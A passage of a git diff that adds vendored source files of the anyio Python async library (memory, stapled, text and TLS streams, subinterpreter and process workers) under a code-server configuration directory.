self._state.waiting_senders: + # Get the item from the next sender + send_event, item = self._state.waiting_senders.popitem(last=False) + self._state.buffer.append(item) + send_event.set() + + if self._state.buffer: + return self._state.buffer.popleft() + elif not self._state.open_send_channels: + raise EndOfStream + + raise WouldBlock + + async def receive(self) -> T_co: + await checkpoint() + try: + return self.receive_nowait() + except WouldBlock: + # Add ourselves in the queue + receive_event = Event() + receiver = _MemoryObjectItemReceiver[T_co]() + self._state.waiting_receivers[receive_event] = receiver + + try: + await receive_event.wait() + finally: + self._state.waiting_receivers.pop(receive_event, None) + + try: + return receiver.item + except AttributeError: + raise EndOfStream from None + + def clone(self) -> MemoryObjectReceiveStream[T_co]: + """ + Create a clone of this receive stream. + + Each clone can be closed separately. Only when all clones have been closed will + the receiving end of the memory stream be considered closed by the sending ends. + + :return: the cloned stream + + """ + if self._closed: + raise ClosedResourceError + + return MemoryObjectReceiveStream(_state=self._state) + + def close(self) -> None: + """ + Close the stream. + + This works the exact same way as :meth:`aclose`, but is provided as a special + case for the benefit of synchronous callbacks. + + """ + if not self._closed: + self._closed = True + self._state.open_receive_channels -= 1 + if self._state.open_receive_channels == 0: + send_events = list(self._state.waiting_senders.keys()) + for event in send_events: + event.set() + + async def aclose(self) -> None: + self.close() + + def statistics(self) -> MemoryObjectStreamStatistics: + """ + Return statistics about the current state of this stream. + + .. versionadded:: 3.0 + """ + return self._state.statistics() + + def __enter__(self) -> MemoryObjectReceiveStream[T_co]: + return self + + def __exit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + self.close() + + def __del__(self) -> None: + if not self._closed: + warnings.warn( + f"Unclosed <{self.__class__.__name__} at {id(self):x}>", + ResourceWarning, + stacklevel=1, + source=self, + ) + + +@dataclass(eq=False) +class MemoryObjectSendStream(Generic[T_contra], ObjectSendStream[T_contra]): + _state: _MemoryObjectStreamState[T_contra] + _closed: bool = field(init=False, default=False) + + def __post_init__(self) -> None: + self._state.open_send_channels += 1 + + def send_nowait(self, item: T_contra) -> None: + """ + Send an item immediately if it can be done without waiting. + + :param item: the item to send + :raises ~anyio.ClosedResourceError: if this send stream has been closed + :raises ~anyio.BrokenResourceError: if the stream has been closed from the + receiving end + :raises ~anyio.WouldBlock: if the buffer is full and there are no tasks waiting + to receive + + """ + if self._closed: + raise ClosedResourceError + if not self._state.open_receive_channels: + raise BrokenResourceError + + while self._state.waiting_receivers: + receive_event, receiver = self._state.waiting_receivers.popitem(last=False) + if not receiver.task_info.has_pending_cancellation(): + receiver.item = item + receive_event.set() + return + + if len(self._state.buffer) < self._state.max_buffer_size: + self._state.buffer.append(item) + else: + raise WouldBlock + + async def send(self, item: T_contra) -> None: + """ + Send an item to the stream. + + If the buffer is full, this method blocks until there is again room in the + buffer or the item can be sent directly to a receiver. + + :param item: the item to send + :raises ~anyio.ClosedResourceError: if this send stream has been closed + :raises ~anyio.BrokenResourceError: if the stream has been closed from the + receiving end + + """ + await checkpoint() + try: + self.send_nowait(item) + except WouldBlock: + # Wait until there's someone on the receiving end + send_event = Event() + self._state.waiting_senders[send_event] = item + try: + await send_event.wait() + except BaseException: + self._state.waiting_senders.pop(send_event, None) + raise + + if send_event in self._state.waiting_senders: + del self._state.waiting_senders[send_event] + raise BrokenResourceError from None + + def clone(self) -> MemoryObjectSendStream[T_contra]: + """ + Create a clone of this send stream. + + Each clone can be closed separately. Only when all clones have been closed will + the sending end of the memory stream be considered closed by the receiving ends. + + :return: the cloned stream + + """ + if self._closed: + raise ClosedResourceError + + return MemoryObjectSendStream(_state=self._state) + + def close(self) -> None: + """ + Close the stream. + + This works the exact same way as :meth:`aclose`, but is provided as a special + case for the benefit of synchronous callbacks. + + """ + if not self._closed: + self._closed = True + self._state.open_send_channels -= 1 + if self._state.open_send_channels == 0: + receive_events = list(self._state.waiting_receivers.keys()) + self._state.waiting_receivers.clear() + for event in receive_events: + event.set() + + async def aclose(self) -> None: + self.close() + + def statistics(self) -> MemoryObjectStreamStatistics: + """ + Return statistics about the current state of this stream. + + .. versionadded:: 3.0 + """ + return self._state.statistics() + + def __enter__(self) -> MemoryObjectSendStream[T_contra]: + return self + + def __exit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + self.close() + + def __del__(self) -> None: + if not self._closed: + warnings.warn( + f"Unclosed <{self.__class__.__name__} at {id(self):x}>", + ResourceWarning, + stacklevel=1, + source=self, + ) diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/stapled.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/stapled.py new file mode 100755 index 0000000..9248b68 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/stapled.py @@ -0,0 +1,147 @@ +from __future__ import annotations + +__all__ = ( + "MultiListener", + "StapledByteStream", + "StapledObjectStream", +) + +from collections.abc import Callable, Mapping, Sequence +from dataclasses import dataclass +from typing import Any, Generic, TypeVar + +from ..abc import ( + ByteReceiveStream, + ByteSendStream, + ByteStream, + Listener, + ObjectReceiveStream, + ObjectSendStream, + ObjectStream, + TaskGroup, +) + +T_Item = TypeVar("T_Item") +T_Stream = TypeVar("T_Stream") + + +@dataclass(eq=False) +class StapledByteStream(ByteStream): + """ + Combines two byte streams into a single, bidirectional byte stream. + + Extra attributes will be provided from both streams, with the receive stream + providing the values in case of a conflict. + + :param ByteSendStream send_stream: the sending byte stream + :param ByteReceiveStream receive_stream: the receiving byte stream + """ + + send_stream: ByteSendStream + receive_stream: ByteReceiveStream + + async def receive(self, max_bytes: int = 65536) -> bytes: + return await self.receive_stream.receive(max_bytes) + + async def send(self, item: bytes) -> None: + await self.send_stream.send(item) + + async def send_eof(self) -> None: + await self.send_stream.aclose() + + async def aclose(self) -> None: + await self.send_stream.aclose() + await self.receive_stream.aclose() + + @property + def extra_attributes(self) -> Mapping[Any, Callable[[], Any]]: + return { + **self.send_stream.extra_attributes, + **self.receive_stream.extra_attributes, + } + + +@dataclass(eq=False) +class StapledObjectStream(Generic[T_Item], ObjectStream[T_Item]): + """ + Combines two object streams into a single, bidirectional object stream. + + Extra attributes will be provided from both streams, with the receive stream + providing the values in case of a conflict. + + :param ObjectSendStream send_stream: the sending object stream + :param ObjectReceiveStream receive_stream: the receiving object stream + """ + + send_stream: ObjectSendStream[T_Item] + receive_stream: ObjectReceiveStream[T_Item] + + async def receive(self) -> T_Item: + return await self.receive_stream.receive() + + async def send(self, item: T_Item) -> None: + await self.send_stream.send(item) + + async def send_eof(self) -> None: + await self.send_stream.aclose() + + async def aclose(self) -> None: + await self.send_stream.aclose() + await self.receive_stream.aclose() + + @property + def extra_attributes(self) -> Mapping[Any, Callable[[], Any]]: + return { + **self.send_stream.extra_attributes, + **self.receive_stream.extra_attributes, + } + + +@dataclass(eq=False) +class MultiListener(Generic[T_Stream], Listener[T_Stream]): + """ + Combines multiple listeners into one, serving connections from all of them at once. + + Any MultiListeners in the given collection of listeners will have their listeners + moved into this one. + + Extra attributes are provided from each listener, with each successive listener + overriding any conflicting attributes from the previous one. + + :param listeners: listeners to serve + :type listeners: Sequence[Listener[T_Stream]] + """ + + listeners: Sequence[Listener[T_Stream]] + + def __post_init__(self) -> None: + listeners: list[Listener[T_Stream]] = [] + for listener in self.listeners: + if isinstance(listener, MultiListener): + listeners.extend(listener.listeners) + del listener.listeners[:] # type: ignore[attr-defined] + else: + listeners.append(listener) + + self.listeners = listeners + + async def serve( + self, handler: Callable[[T_Stream], Any], task_group: TaskGroup | None = None + ) -> None: + from .. import create_task_group + + async with create_task_group() as tg: + for listener in self.listeners: + tg.start_soon(listener.serve, handler, task_group) + + async def aclose(self) -> None: + for listener in self.listeners: + await listener.aclose() + + @property + def extra_attributes(self) -> Mapping[Any, Callable[[], Any]]: + attributes: dict = {} + for listener in self.listeners: + attributes.update(listener.extra_attributes) + + return attributes diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/text.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/text.py new file mode 100755 index 0000000..296cd25 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/text.py @@ -0,0 +1,176 @@ +from __future__ import annotations + +__all__ = ( + "TextConnectable", + "TextReceiveStream", + "TextSendStream", + "TextStream", +) + +import codecs +import sys +from collections.abc import Callable, Mapping +from dataclasses import InitVar, dataclass, field +from typing import Any + +from ..abc import ( + AnyByteReceiveStream, + AnyByteSendStream, + AnyByteStream, + AnyByteStreamConnectable, + ObjectReceiveStream, + ObjectSendStream, + ObjectStream, + ObjectStreamConnectable, +) + +if sys.version_info >= (3, 12): + from typing import override +else: + from typing_extensions import override + + +@dataclass(eq=False) +class TextReceiveStream(ObjectReceiveStream[str]): + """ + Stream wrapper that decodes bytes to strings using the given encoding. + + Decoding is done using :class:`~codecs.IncrementalDecoder` which returns any + completely received unicode characters as soon as they come in. + + :param transport_stream: any bytes-based receive stream + :param encoding: character encoding to use for decoding bytes to strings (defaults + to ``utf-8``) + :param errors: handling scheme for decoding errors (defaults to ``strict``; see the + `codecs module documentation`_ for a comprehensive list of options) + + .. _codecs module documentation: + https://docs.python.org/3/library/codecs.html#codec-objects + """ + + transport_stream: AnyByteReceiveStream + encoding: InitVar[str] = "utf-8" + errors: InitVar[str] = "strict" + _decoder: codecs.IncrementalDecoder = field(init=False) + + def __post_init__(self, encoding: str, errors: str) -> None: + decoder_class = codecs.getincrementaldecoder(encoding) + self._decoder = decoder_class(errors=errors) + + async def receive(self) -> str: + while True: + chunk = await self.transport_stream.receive() + decoded = self._decoder.decode(chunk) + if decoded: + return decoded + + async def aclose(self) -> None: + await self.transport_stream.aclose() + self._decoder.reset() + + @property + def extra_attributes(self) -> Mapping[Any, Callable[[], Any]]: + return self.transport_stream.extra_attributes + + +@dataclass(eq=False) +class TextSendStream(ObjectSendStream[str]): + """ + Sends strings to the wrapped stream as bytes using the given encoding. + + :param AnyByteSendStream transport_stream: any bytes-based send stream + :param str encoding: character encoding to use for encoding strings to bytes + (defaults to ``utf-8``) + :param str errors: handling scheme for encoding errors (defaults to ``strict``; see + the `codecs module documentation`_ for a comprehensive list of options) + + .. _codecs module documentation: + https://docs.python.org/3/library/codecs.html#codec-objects + """ + + transport_stream: AnyByteSendStream + encoding: InitVar[str] = "utf-8" + errors: str = "strict" + _encoder: Callable[..., tuple[bytes, int]] = field(init=False) + + def __post_init__(self, encoding: str) -> None: + self._encoder = codecs.getencoder(encoding) + + async def send(self, item: str) -> None: + encoded = self._encoder(item, self.errors)[0] + await self.transport_stream.send(encoded) + + async def aclose(self) -> None: + await self.transport_stream.aclose() + + @property + def extra_attributes(self) -> Mapping[Any, Callable[[], Any]]: + return self.transport_stream.extra_attributes + + +@dataclass(eq=False) +class TextStream(ObjectStream[str]): + """ + A bidirectional stream that decodes bytes to strings on receive and encodes strings + to bytes on send. + + Extra attributes will be provided from both streams, with the receive stream + providing the values in case of a conflict. + + :param AnyByteStream transport_stream: any bytes-based stream + :param str encoding: character encoding to use for encoding/decoding strings to/from + bytes (defaults to ``utf-8``) + :param str errors: handling scheme for encoding errors (defaults to ``strict``; see + the `codecs module documentation`_ for a comprehensive list of options) + + .. _codecs module documentation: + https://docs.python.org/3/library/codecs.html#codec-objects + """ + + transport_stream: AnyByteStream + encoding: InitVar[str] = "utf-8" + errors: InitVar[str] = "strict" + _receive_stream: TextReceiveStream = field(init=False) + _send_stream: TextSendStream = field(init=False) + + def __post_init__(self, encoding: str, errors: str) -> None: + self._receive_stream = TextReceiveStream( + self.transport_stream, encoding=encoding, errors=errors + ) + self._send_stream = TextSendStream( + self.transport_stream, encoding=encoding, errors=errors + ) + + async def receive(self) -> str: + return await self._receive_stream.receive() + + async def send(self, item: str) -> None: + await self._send_stream.send(item) + + async def send_eof(self) -> None: + await self.transport_stream.send_eof() + + async def aclose(self) -> None: + await self._send_stream.aclose() + await self._receive_stream.aclose() + + @property + def extra_attributes(self) -> Mapping[Any, Callable[[], Any]]: + return { + **self._send_stream.extra_attributes, + **self._receive_stream.extra_attributes, + } + + +class TextConnectable(ObjectStreamConnectable[str]): + def __init__(self, connectable: AnyByteStreamConnectable): + """ + :param connectable: the bytestream endpoint to wrap + + """ + self.connectable = connectable + + @override + async def connect(self) -> TextStream: + stream = await self.connectable.connect() + return TextStream(stream) diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/tls.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/tls.py new file mode 100755 index 0000000..b507488 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/tls.py @@ -0,0 +1,424 @@ +from __future__ import annotations + +__all__ = ( + "TLSAttribute", + "TLSConnectable", + "TLSListener", + "TLSStream", +) + +import logging +import re +import ssl +import sys +from collections.abc import Callable, Mapping +from dataclasses import dataclass +from functools import wraps +from ssl import SSLContext +from typing import Any, TypeVar + +from .. import ( + BrokenResourceError, + EndOfStream, + aclose_forcefully, + get_cancelled_exc_class, + to_thread, +) +from .._core._typedattr import TypedAttributeSet, typed_attribute +from ..abc import ( + AnyByteStream, + AnyByteStreamConnectable, + ByteStream, + ByteStreamConnectable, + Listener, + TaskGroup, +) + +if sys.version_info >= (3, 10): + from typing import TypeAlias +else: + from typing_extensions import TypeAlias + +if sys.version_info >= (3, 11): + from typing import TypeVarTuple, Unpack +else: + from typing_extensions import TypeVarTuple, Unpack + +if sys.version_info >= (3, 12): + from typing import override +else: + from typing_extensions import override + +T_Retval = TypeVar("T_Retval") +PosArgsT = TypeVarTuple("PosArgsT") +_PCTRTT: TypeAlias = tuple[tuple[str, str], ...] +_PCTRTTT: TypeAlias = tuple[_PCTRTT, ...] + + +class TLSAttribute(TypedAttributeSet): + """Contains Transport Layer Security related attributes.""" + + #: the selected ALPN protocol + alpn_protocol: str | None = typed_attribute() + #: the channel binding for type ``tls-unique`` + channel_binding_tls_unique: bytes = typed_attribute() + #: the selected cipher + cipher: tuple[str, str, int] = typed_attribute() + #: the peer certificate in dictionary form (see :meth:`ssl.SSLSocket.getpeercert` + # for more information) + peer_certificate: None | (dict[str, str | _PCTRTTT | _PCTRTT]) = typed_attribute() + #: the peer certificate in binary form + peer_certificate_binary: bytes | None = typed_attribute() + #: ``True`` if this is the server side of the connection + server_side: bool = typed_attribute() + #: ciphers shared by the client during the TLS handshake (``None`` if this is the + #: client side) + shared_ciphers: list[tuple[str, str, int]] | None = typed_attribute() + #: the :class:`~ssl.SSLObject` used for encryption + ssl_object: ssl.SSLObject = typed_attribute() + #: ``True`` if this stream does (and expects) a closing TLS handshake when the + #: stream is being closed + standard_compatible: bool = typed_attribute() + #: the TLS protocol version (e.g. ``TLSv1.2``) + tls_version: str = typed_attribute() + + +@dataclass(eq=False) +class TLSStream(ByteStream): + """ + A stream wrapper that encrypts all sent data and decrypts received data. + + This class has no public initializer; use :meth:`wrap` instead. + All extra attributes from :class:`~TLSAttribute` are supported. + + :var AnyByteStream transport_stream: the wrapped stream + + """ + + transport_stream: AnyByteStream + standard_compatible: bool + _ssl_object: ssl.SSLObject + _read_bio: ssl.MemoryBIO + _write_bio: ssl.MemoryBIO + + @classmethod + async def wrap( + cls, + transport_stream: AnyByteStream, + *, + server_side: bool | None = None, + hostname: str | None = None, + ssl_context: ssl.SSLContext | None = None, + standard_compatible: bool = True, + ) -> TLSStream: + """ + Wrap an existing stream with Transport Layer Security. + + This performs a TLS handshake with the peer. + + :param transport_stream: a bytes-transporting stream to wrap + :param server_side: ``True`` if this is the server side of the connection, + ``False`` if this is the client side (if omitted, will be set to ``False`` + if ``hostname`` has been provided, ``False`` otherwise). Used only to create + a default context when an explicit context has not been provided. + :param hostname: host name of the peer (if host name checking is desired) + :param ssl_context: the SSLContext object to use (if not provided, a secure + default will be created) + :param standard_compatible: if ``False``, skip the closing handshake when + closing the connection, and don't raise an exception if the peer does the + same + :raises ~ssl.SSLError: if the TLS handshake fails + + """ + if server_side is None: + server_side = not hostname + + if not ssl_context: + purpose = ( + ssl.Purpose.CLIENT_AUTH if server_side else ssl.Purpose.SERVER_AUTH + ) + ssl_context = ssl.create_default_context(purpose) + + # Re-enable detection of unexpected EOFs if it was disabled by Python + if hasattr(ssl, "OP_IGNORE_UNEXPECTED_EOF"): + ssl_context.options &= ~ssl.OP_IGNORE_UNEXPECTED_EOF + + bio_in = ssl.MemoryBIO() + bio_out = ssl.MemoryBIO() + + # External SSLContext implementations may do blocking I/O in wrap_bio(), + # but the standard library implementation won't + if type(ssl_context) is ssl.SSLContext: + ssl_object = ssl_context.wrap_bio( + bio_in, bio_out, server_side=server_side, server_hostname=hostname + ) + else: + ssl_object = await to_thread.run_sync( + ssl_context.wrap_bio, + bio_in, + bio_out, + server_side, + hostname, + None, + ) + + wrapper = cls( + transport_stream=transport_stream, + standard_compatible=standard_compatible, + _ssl_object=ssl_object, + _read_bio=bio_in, + _write_bio=bio_out, + ) + await wrapper._call_sslobject_method(ssl_object.do_handshake) + return wrapper + + async def _call_sslobject_method( + self, func: Callable[[Unpack[PosArgsT]], T_Retval], *args: Unpack[PosArgsT] + ) -> T_Retval: + while True: + try: + result = func(*args) + except ssl.SSLWantReadError: + try: + # Flush any pending writes first + if self._write_bio.pending: + await self.transport_stream.send(self._write_bio.read()) + + data = await self.transport_stream.receive() + except EndOfStream: + self._read_bio.write_eof() + except OSError as exc: + self._read_bio.write_eof() + self._write_bio.write_eof() + raise BrokenResourceError from exc + else: + self._read_bio.write(data) + except ssl.SSLWantWriteError: + await self.transport_stream.send(self._write_bio.read()) + except ssl.SSLSyscallError as exc: + self._read_bio.write_eof() + self._write_bio.write_eof() + raise BrokenResourceError from exc + except ssl.SSLError as exc: + self._read_bio.write_eof() + self._write_bio.write_eof() + if isinstance(exc, ssl.SSLEOFError) or ( + exc.strerror and "UNEXPECTED_EOF_WHILE_READING" in exc.strerror + ): + if self.standard_compatible: + raise BrokenResourceError from exc + else: + raise EndOfStream from None + + raise + else: + # Flush any pending writes first + if self._write_bio.pending: + await self.transport_stream.send(self._write_bio.read()) + + return result + + async def unwrap(self) -> tuple[AnyByteStream, bytes]: + """ + Does the TLS closing handshake. + + :return: a tuple of (wrapped byte stream, bytes left in the read buffer) + + """ + await self._call_sslobject_method(self._ssl_object.unwrap) + self._read_bio.write_eof() + self._write_bio.write_eof() + return self.transport_stream, self._read_bio.read() + + async def aclose(self) -> None: + if self.standard_compatible: + try: + await self.unwrap() + except BaseException: + await aclose_forcefully(self.transport_stream) + raise + + await self.transport_stream.aclose() + + async def receive(self, max_bytes: int = 65536) -> bytes: + data = await self._call_sslobject_method(self._ssl_object.read, max_bytes) + if not data: + raise EndOfStream + + return data + + async def send(self, item: bytes) -> None: + await self._call_sslobject_method(self._ssl_object.write, item) + + async def send_eof(self) -> None: + tls_version = self.extra(TLSAttribute.tls_version) + match = re.match(r"TLSv(\d+)(?:\.(\d+))?", tls_version) + if match: + major, minor = int(match.group(1)), int(match.group(2) or 0) + if (major, minor) < (1, 3): + raise NotImplementedError( + f"send_eof() requires at least TLSv1.3; current " + f"session uses {tls_version}" + ) + + raise NotImplementedError( + "send_eof() has not yet been implemented for TLS streams" + ) + + @property + def extra_attributes(self) -> Mapping[Any, Callable[[], Any]]: + return { + **self.transport_stream.extra_attributes, + TLSAttribute.alpn_protocol: self._ssl_object.selected_alpn_protocol, + TLSAttribute.channel_binding_tls_unique: ( + self._ssl_object.get_channel_binding + ), + TLSAttribute.cipher: self._ssl_object.cipher, + TLSAttribute.peer_certificate: lambda: self._ssl_object.getpeercert(False), + TLSAttribute.peer_certificate_binary: lambda: self._ssl_object.getpeercert( + True + ), + TLSAttribute.server_side: lambda: self._ssl_object.server_side, + TLSAttribute.shared_ciphers: lambda: self._ssl_object.shared_ciphers() + if self._ssl_object.server_side + else None, + TLSAttribute.standard_compatible: lambda: self.standard_compatible, + TLSAttribute.ssl_object: lambda: self._ssl_object, + TLSAttribute.tls_version: self._ssl_object.version, + } + + +@dataclass(eq=False) +class TLSListener(Listener[TLSStream]): + """ + A convenience listener that wraps another listener and auto-negotiates a TLS session + on every accepted connection. + + If the TLS handshake times out or raises an exception, + :meth:`handle_handshake_error` is called to do whatever post-mortem processing is + deemed necessary. + + Supports only the :attr:`~TLSAttribute.standard_compatible` extra attribute. + + :param Listener listener: the listener to wrap + :param ssl_context: the SSL context object + :param standard_compatible: a flag passed through to :meth:`TLSStream.wrap` + :param handshake_timeout: time limit for the TLS handshake + (passed to :func:`~anyio.fail_after`) + """ + + listener: Listener[Any] + ssl_context: ssl.SSLContext + standard_compatible: bool = True + handshake_timeout: float = 30 + + @staticmethod + async def handle_handshake_error(exc: BaseException, stream: AnyByteStream) -> None: + """ + Handle an exception raised during the TLS handshake. + + This method does 3 things: + + #. Forcefully closes the original stream + #. Logs the exception (unless it was a cancellation exception) using the + ``anyio.streams.tls`` logger + #. Reraises the exception if it was a base exception or a cancellation exception + + :param exc: the exception + :param stream: the original stream + + """ + await aclose_forcefully(stream) + + # Log all except cancellation exceptions + if not isinstance(exc, get_cancelled_exc_class()): + # CPython (as of 3.11.5) returns incorrect `sys.exc_info()` here when using + # any asyncio implementation, so we explicitly pass the exception to log + # (https://github.com/python/cpython/issues/108668). Trio does not have this + # issue because it works around the CPython bug. + logging.getLogger(__name__).exception( + "Error during TLS handshake", exc_info=exc + ) + + # Only reraise base exceptions and cancellation exceptions + if not isinstance(exc, Exception) or isinstance(exc, get_cancelled_exc_class()): + raise + + async def serve( + self, + handler: Callable[[TLSStream], Any], + task_group: TaskGroup | None = None, + ) -> None: + @wraps(handler) + async def handler_wrapper(stream: AnyByteStream) -> None: + from .. import fail_after + + try: + with fail_after(self.handshake_timeout): + wrapped_stream = await TLSStream.wrap( + stream, + ssl_context=self.ssl_context, + standard_compatible=self.standard_compatible, + ) + except BaseException as exc: + await self.handle_handshake_error(exc, stream) + else: + await handler(wrapped_stream) + + await self.listener.serve(handler_wrapper, task_group) + + async def aclose(self) -> None: + await self.listener.aclose() + + @property + def extra_attributes(self) -> Mapping[Any, Callable[[], Any]]: + return { + TLSAttribute.standard_compatible: lambda: self.standard_compatible, + } + + +class TLSConnectable(ByteStreamConnectable): + """ + Wraps another connectable and does TLS negotiation after a successful connection. + + :param connectable: the connectable to wrap + :param hostname: host name of the server (if host name checking is desired) + :param ssl_context: the SSLContext object to use (if not provided, a secure default + will be created) + :param standard_compatible: if ``False``, skip the closing handshake when closing + the connection, and don't raise an exception if the server does the same + """ + + def __init__( + self, + connectable: AnyByteStreamConnectable, + *, + hostname: str | None = None, + ssl_context: ssl.SSLContext | None = None, + standard_compatible: bool = True, + ) -> None: + self.connectable = connectable + self.ssl_context: SSLContext = ssl_context or ssl.create_default_context( + ssl.Purpose.SERVER_AUTH + ) + if not isinstance(self.ssl_context, ssl.SSLContext): + raise TypeError( + "ssl_context must be an instance of ssl.SSLContext, not " + f"{type(self.ssl_context).__name__}" + ) + self.hostname = hostname + self.standard_compatible = standard_compatible + + @override + async def connect(self) -> TLSStream: + stream = await self.connectable.connect() + try: + return await TLSStream.wrap( + stream, + hostname=self.hostname, + ssl_context=self.ssl_context, + standard_compatible=self.standard_compatible, + ) + except BaseException: + await aclose_forcefully(stream) + raise diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/to_interpreter.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/to_interpreter.py new file mode 100755 index 0000000..694dbe7 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/to_interpreter.py @@ -0,0 +1,246 @@ +from __future__ import annotations + +__all__ = ( + "run_sync", + "current_default_interpreter_limiter", +) + +import atexit +import os +import sys +from collections import deque +from collections.abc import Callable +from typing import Any, Final, TypeVar + +from . import current_time, to_thread +from ._core._exceptions import BrokenWorkerInterpreter +from ._core._synchronization import CapacityLimiter +from .lowlevel import RunVar + +if sys.version_info >= (3, 11): + from typing import TypeVarTuple, Unpack +else: + from typing_extensions import TypeVarTuple, Unpack + +if sys.version_info >= (3, 14): + from concurrent.interpreters import ExecutionFailed, create + + def _interp_call( + func: Callable[..., Any], args: tuple[Any, ...] + ) -> tuple[Any, bool]: + try: + retval = func(*args) + except BaseException as exc: + return exc, True + else: + return retval, False + + class _Worker: + last_used: float = 0 + + def __init__(self) -> None: + self._interpreter = create() + + def destroy(self) -> None: + self._interpreter.close() + + def call( + self, + func: Callable[..., T_Retval], + args: tuple[Any, ...], + ) -> T_Retval: + try: + res, is_exception = self._interpreter.call(_interp_call, func, args) + except ExecutionFailed as exc: + raise BrokenWorkerInterpreter(exc.excinfo) from exc + + if is_exception: + raise res + + return res +elif sys.version_info >= (3, 13): + import _interpqueues + import _interpreters + + UNBOUND: Final = 2 # I have no clue how this works, but it was used in the stdlib + FMT_UNPICKLED: Final = 0 + FMT_PICKLED: Final = 1 + QUEUE_PICKLE_ARGS: Final = (FMT_PICKLED, UNBOUND) + QUEUE_UNPICKLE_ARGS: Final = (FMT_UNPICKLED, UNBOUND) + + _run_func = compile( + """ +import _interpqueues +from _interpreters import NotShareableError +from pickle import loads, dumps, HIGHEST_PROTOCOL + +QUEUE_PICKLE_ARGS = (1, 2) +QUEUE_UNPICKLE_ARGS = (0, 2) + +item = _interpqueues.get(queue_id)[0] +try: + func, args = loads(item) + retval = func(*args) +except BaseException as exc: + is_exception = True + retval = exc +else: + is_exception = False + +try: + _interpqueues.put(queue_id, (retval, is_exception), *QUEUE_UNPICKLE_ARGS) +except NotShareableError: + retval = dumps(retval, HIGHEST_PROTOCOL) + _interpqueues.put(queue_id, (retval, is_exception), *QUEUE_PICKLE_ARGS) + """, + "", + "exec", + ) + + class _Worker: + last_used: float = 0 + + def __init__(self) -> None: + self._interpreter_id = _interpreters.create() + self._queue_id = _interpqueues.create(1, *QUEUE_UNPICKLE_ARGS) + _interpreters.set___main___attrs( + self._interpreter_id, {"queue_id": self._queue_id} + ) + + def destroy(self) -> None: + _interpqueues.destroy(self._queue_id) + _interpreters.destroy(self._interpreter_id) + + def call( + self, + func: Callable[..., T_Retval], + args: tuple[Any, ...], + ) -> T_Retval: + import pickle + + item = pickle.dumps((func, args), pickle.HIGHEST_PROTOCOL) + _interpqueues.put(self._queue_id, item, *QUEUE_PICKLE_ARGS) + exc_info = _interpreters.exec(self._interpreter_id, _run_func) + if exc_info: + raise BrokenWorkerInterpreter(exc_info) + + res = _interpqueues.get(self._queue_id) + (res, is_exception), fmt = res[:2] + if fmt == FMT_PICKLED: + res = pickle.loads(res) + + if is_exception: + raise res + + return res +else: + + class _Worker: + last_used: float = 0 + + def __init__(self) -> None: + raise RuntimeError("subinterpreters require at least Python 3.13") + + def call( + self, + func: Callable[..., T_Retval], + args: tuple[Any, ...], + ) -> T_Retval: + raise NotImplementedError + + def destroy(self) -> None: + pass + + +DEFAULT_CPU_COUNT: Final = 8 # this is just an arbitrarily selected value +MAX_WORKER_IDLE_TIME = ( + 30 # seconds a subinterpreter can be idle before becoming eligible for pruning +) + +T_Retval = TypeVar("T_Retval") +PosArgsT = TypeVarTuple("PosArgsT") + +_idle_workers = RunVar[deque[_Worker]]("_available_workers") +_default_interpreter_limiter = RunVar[CapacityLimiter]("_default_interpreter_limiter") + + +def _stop_workers(workers: deque[_Worker]) -> None: + for worker in workers: + worker.destroy() + + workers.clear() + + +async def run_sync( + func: Callable[[Unpack[PosArgsT]], T_Retval], + *args: Unpack[PosArgsT], + limiter: CapacityLimiter | None = None, +) -> T_Retval: + """ + Call the given function with the given arguments in a subinterpreter. + + .. warning:: On Python 3.13, the :mod:`concurrent.interpreters` module was not yet + available, so the code path for that Python version relies on an undocumented, + private API. As such, it is recommended to not rely on this function for anything + mission-critical on Python 3.13. + + :param func: a callable + :param args: the positional arguments for the callable + :param limiter: capacity limiter to use to limit the total number of subinterpreters + running (if omitted, the default limiter is used) + :return: the result of the call + :raises BrokenWorkerInterpreter: if there's an internal error in a subinterpreter + + """ + if limiter is None: + limiter = current_default_interpreter_limiter() + + try: + idle_workers = _idle_workers.get() + except LookupError: + idle_workers = deque() + _idle_workers.set(idle_workers) + atexit.register(_stop_workers, idle_workers) + + async with limiter: + try: + worker = idle_workers.pop() + except IndexError: + worker = _Worker() + + try: + return await to_thread.run_sync( + worker.call, + func, + args, + limiter=limiter, + ) + finally: + # Prune workers that have been idle for too long + now = current_time() + while idle_workers: + if now - idle_workers[0].last_used <= MAX_WORKER_IDLE_TIME: + break + + await to_thread.run_sync(idle_workers.popleft().destroy, limiter=limiter) + + worker.last_used = current_time() + idle_workers.append(worker) + + +def current_default_interpreter_limiter() -> CapacityLimiter: + """ + Return the capacity limiter used by default to limit the number of concurrently + running subinterpreters. + + Defaults to the number of CPU cores. + + :return: a capacity limiter object + + """ + try: + return _default_interpreter_limiter.get() + except LookupError: + limiter = CapacityLimiter(os.cpu_count() or DEFAULT_CPU_COUNT) + _default_interpreter_limiter.set(limiter) + return limiter diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/to_process.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/to_process.py new file mode 100755 index 0000000..b289234 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/to_process.py @@ -0,0 +1,266 @@ +from __future__ import annotations + +__all__ = ( + "current_default_process_limiter", + "process_worker", + "run_sync", +) + +import os +import pickle +import subprocess +import sys +from collections import deque +from collections.abc import Callable +from importlib.util import module_from_spec, spec_from_file_location +from typing import TypeVar, cast + +from ._core._eventloop import current_time, get_async_backend, get_cancelled_exc_class +from ._core._exceptions import BrokenWorkerProcess +from ._core._subprocesses import open_process +from ._core._synchronization import CapacityLimiter +from ._core._tasks import CancelScope, fail_after +from .abc import ByteReceiveStream, ByteSendStream, Process +from .lowlevel import RunVar, 